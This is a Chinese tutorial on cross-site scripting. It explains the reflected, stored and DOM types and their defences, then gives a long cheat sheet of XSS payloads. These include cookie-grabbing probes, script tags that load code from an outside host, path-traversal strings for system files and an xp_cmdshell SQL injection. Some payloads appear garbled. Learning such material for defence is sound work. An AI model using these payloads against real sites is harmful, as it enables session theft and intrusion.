XSS攻击

什么是XSS：
XSS，即cross-site-scripting,跨站脚本攻击。

        跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。当用户访问包含攻击脚本的特定网页，就会产生XSS。

        XSS 的原理是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码，当用户浏览该页之时，嵌入其中 Web 里面的脚本代码会被执行，从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。

XSS攻击主要分为三种：反射型XSS，存储型XSS，DOM-XSS等。

主要涉及三方：攻击者，用户，web server等。

一.危害
挂马

盗取用户Cookie。

DOS（拒绝服务）客户端浏览器。

钓鱼攻击，高级的钓鱼技巧。

删除目标文章、恶意篡改数据、嫁祸。

劫持用户Web行为，甚至进一步渗透内网。

爆发Web2.0蠕虫。

蠕虫式的DDoS攻击。

蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据。

其它安全问题

二.分类
1.反射型（reflected）（非持久型XSS）

反射型XSS又称非持久性跨站点脚本攻击，它是最常见的XSS攻击类型。

发出请求后，服务器端对请求进行解析后响应，并返回包含有XSS脚本的响应，浏览器对其进行解析并执行。

当一个网页获取url中的参数展示在页面上，并且没有对获取到的数据进行转义或者进行的转义有漏洞，那么就会存在被攻击的风险。

攻击脚本并没有存入网站数据库，而是隐藏在链接中，通过链接传播。只要用户点击了链接就很可能会被盗取信息。

特征：

（1）即时性，不经过服务器存储，直接通过 HTTP 的 GET 和 POST 请求就能完成一次攻击，拿到用户隐私数据。

（2） 攻击者需要诱骗点击,必须要通过用户点击链接才能发起。

（3） 反馈率低，所以较难发现和响应修复。

（4） 盗取用户敏感保密信息 。

为了防止出现非持久型XSS，需要确保以下事情：

（1）Web 页面渲染的所有内容或者渲染的数据都必须来自于服务端。

（2）尽量不要从 URL，document.referrer，document.forms 等这种 DOM API 中获取数据直接渲染。

（3）尽量不要使用eval, newFunction()，document.write()，document.writeln()，

window.setInterval()，window.setTimeout()，innerHTML，document.createElement()

等可执行字符串的方法。

（4）如果做不到以上几点，也必须对涉及 DOM 渲染的方法传入的字符串参数做 escape 转  义。前端渲染的时候对任何的字段都需要做 escape 转义编码。



反射型
2.存储型（stored）（持久型XSS）

一般存在于 Form 表单提交等交互功能，如文章留言，提交文本信息等，黑客利用的 XSS 漏洞，将内容经正常功能提交进入数据库持久保存，当前端页面获得后端从数据库中读出的注入代码时，恰好将其渲染执行。

持久的XSS相比非持久XSS攻击危害更大，因为每当用打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS攻击。

存储型XSS与反射型XSS的差别在于，存储型XSS将攻击脚本存储在数据库中，不需要诱骗点击，黑客只需要在提交表单的地方完成注入即可，但是这种 XSS 攻击的成本相对还是很高。

最典型的例子是留言板XSS，用户提交一条包含XSS代码的留言存储到数据库，目标用户查看留言板时，那些留言的内容会从数据库查询出来并显示，浏览器发现有XSS代码，就当做正常的HTML与Js解析执行，于是触发了XSS攻击。

攻击脚本存储在网站数据库，所以在链接上看不出来一点异样，更加隐蔽，破坏性更大。

攻击成功需要同时满足以下条件：

（1）POST 请求提交表单后端没做转义直接入库。

（2）后端从数据库中取出数据没做转义直接输出给前端。

（3）前端拿到后端数据没做转义直接渲染成 DOM。

特点：

（1）持久性，植入在数据库中

（2）盗取用户敏感私密信息

（3）危害面广

防御措施

1.CSP

CSP 本质上就是建立白名单，开发者明确告诉浏览器哪些外部资源可以加载和执行。我们只需要配置规则，如何拦截是由浏览器自己实现的。我们可以通过这种方式来尽量减少 XSS 攻击。

通常可以通过两种方式来开启 CSP：

（1）设置 HTTP Header 中的 Content-Security-Policy

（2）设置 meta 标签的方式

2.对用户输入进行转义

“永远不要相信用户的输入”





存储型
3.DOM XSS

DOM XSS与另外两种的区别主要是：DOM XSS的代码并不需要服务器参与，触发XSS取决于浏览器端的DOM解析，完全是客户端的事情。



三.常见代码
常用的JavaScript方法

    alert                    用于显示带有一条指定消息和一个确认按钮的警告框。

    window.location  用于获得当前页面地址的地址，并把浏览器重定向到新的页面。

    onload                一张页面或一幅图像完成加载。

    onsubmit            确认按钮被点击。

    onerror              在加载文档或图像时发生错误。


常见代码：

1. 1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt>
   
2. 
   
3. <svg/οnlοad=alert(1)>
   
4. 
   
5. <script>alert(document.cookie)</script>
   
6. 
   
7. '><script>alert(document.cookie)</script>
   
8. 
   
9. ='><script>alert(document.cookie)</script>
   
10. 
    
11. <script>alert(vulnerable)</script>
    
12. 
    
13. %3Cscript%3Ealert('XSS')%3C/script%3E
    
14. 
    
15. <script>alert('XSS')</script>
    
16. 
    
17. <img src="javascript:alert('XSS')">
    
18. 
    
19. %0a%0a<script>alert("Vulnerable")</script>.jsp
    
20. 
    
21. %22%3cscript%3ealert(%22xss%22)%3c/script%3e
    
22. 
    
23. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    
24. 
    
25. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
    
26. 
    
27. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    
28. 
    
29. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    
30. 
    
31. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
    
32. 
    
33. <script>alert('Vulnerable');</script>
    
34. 
    
35. <script>alert('Vulnerable')</script>
    
36. 
    
37. a.jsp/<script>alert('Vulnerable')</script>
    
38. 
    
39. a?<script>alert('Vulnerable')</script>
    
40. 
    
41. "><script>alert('Vulnerable')</script>
    
42. 
    
43. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
    
44. 
    
45. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
46. 
    
47. %3Cscript%3Ealert(document. domain);%3C/script%3E&
    
48. 
    
49. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
    
50. 
    
51. <IMG src="javascript:alert('XSS');">
    
52. 
    
53. <IMG src=javascript:alert('XSS')>
    
54. 
    
55. <IMG src=JaVaScRiPt:alert('XSS')>
    
56. 
    
57. <IMG src=JaVaScRiPt:alert("XSS")>
    
58. 
    
59. <IMG src=javascript:alert('XSS')>
    
60. 
    
61. <IMG src=javascript:alert('XSS')>
    
62. 
    
63. <IMG src=javascript:alert('XSS')>
    
64. 
    
65. <IMG src="jav ascript:alert('XSS');">
    
66. 
    
67. <IMG src="jav ascript:alert('XSS');">
    
68. 
    
69. <IMG src="jav ascript:alert('XSS');">
    
70. 
    
71. "<IMG src=java\0script:alert("XSS")>";' > out
    
72. 
    
73. <IMG src=" javascript:alert('XSS');">
    
74. 
    
75. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
    
76. 
    
77. <BODY BACKGROUND="javascript:alert('XSS')">
    
78. 
    
79. <BODY ONLOAD=alert('XSS')>
    
80. 
    
81. <IMG DYNSRC="javascript:alert('XSS')">
    
82. 
    
83. <IMG LOWSRC="javascript:alert('XSS')">
    
84. 
    
85. <BGSOUND src="javascript:alert('XSS');">
    
86. 
    
87. <br size="&{alert('XSS')}">
    
88. 
    
89. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
    
90. 
    
91. <LINK REL="stylesheet" href="javascript:alert('XSS');">
    
92. 
    
93. <IMG src='vbscript:msgbox("XSS")'>
    
94. 
    
95. <IMG src="mocha:[code]">
    
96. 
    
97. <IMG src="livescript:[code]">
    
98. 
    
99. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
    
100. 
     
101. <IFRAME src=javascript:alert('XSS')></IFRAME>
     
102. 
     
103. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
     
104. 
     
105. <TABLE BACKGROUND="javascript:alert('XSS')">
     
106. 
     
107. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
     
108. 
     
109. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
     
110. 
     
111. <DIV STYLE="width: expression(alert('XSS'));">
     
112. 
     
113. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
     
114. 
     
115. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
     
116. 
     
117. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
     
118. 
     
119. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
     
120. 
     
121. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
     
122. 
     
123. <BASE href="javascript:alert('XSS');//">
     
124. 
     
125. getURL("javascript:alert('XSS')")
     
126. 
     
127. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
     
128. 
     
129. <XML src="javascript:alert('XSS');">
     
130. 
     
131. "> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
     
132. 
     
133. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
     
134. 
     
135. <IMG src="javascript:alert('XSS')"
     
136. 
     
137. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
     
138. 
     
139. '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
     
140. 
     
141. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
     
142. 
     
143. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
144. 
     
145. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
146. 
     
147. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
148. 
     
149. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
150. 
     
151. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
152. 
     
153. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
     
154. 
     
155. <IMG SRC=javascript:alert(‘XSS’)>
     
156. 
     
157. <IMG SRC=# οnmοuseοver=”alert(‘xxs’)”>
     
158. 
     
159. <IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img>
     
160. 
     
161. <img src=x οnerrοr=”javascript:alert('XSS')″>
     
162. 
     
163. <IMG SRC=javascript:alert(
     
164. 
     
165. 'XSS')>
     
166. 
     
167. <IMG SRC=javascript:alert('XSS')>
     
168. 
     
169. <IMG SRC=”jav ascript:alert(‘XSS’);”>
     
170. 
     
171. <IMG SRC=”jav
     
172. ascript:alert(‘XSS’);”>
     
173. 
     
174. <IMG SRC=”   javascript:alert(‘XSS’);”>
     
175. 
     
176. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
     
177. 
     
178. <IMG SRC=”javascript:alert(‘XSS’)”
     
179. 
     
180. </script><script>alert(‘XSS’);</script>
     
181. 
     
182. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
     
183. 
     
184. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
     
185. 
     
186. <svg/οnlοad=alert('XSS')>
     
187. 
     
188. <IMG SRC=’vbscript:msgbox(“XSS”)’>
     
189. 
     
190. <BGSOUND SRC="javascript:alert('XSS');">
     
191. 
     
192. <BR SIZE="&{alert('XSS')}">
     
193. 
     
194. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
     
195. 
     
196. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
     
197. 
     
198. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
     
199. 
     
200. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
     
201. 
     
202. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
     
203. 
     
204. <XSS STYLE="behavior: url(xss.htc);">
     
205. 
     
206. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
     
207. 
     
208. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
     
209. 
     
210. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
     
211. 
     
212. <DIV STYLE="width: expression(alert('XSS'));">
     
213. 
     
214. <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
     
215. 
     
216. 作者：喵喵喵不吃小鱼干
     
217. 链接：https://www.jianshu.com/p/7b85f781271b
     
218. 来源：简书
     
219. 著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

复制代码

四.总结
产生的原因：无充分过滤，产生不合法的参数或输入内容，比如URL中没有进行转义或者转义存在漏洞，都会产生XSS攻击的风险。

防御：

“永远不要相信用户的输入”

具体转义的对象就是一些 / ” < > 之类的特殊字符，防止形成可执行脚本。

对输入与URL过滤

对输出编码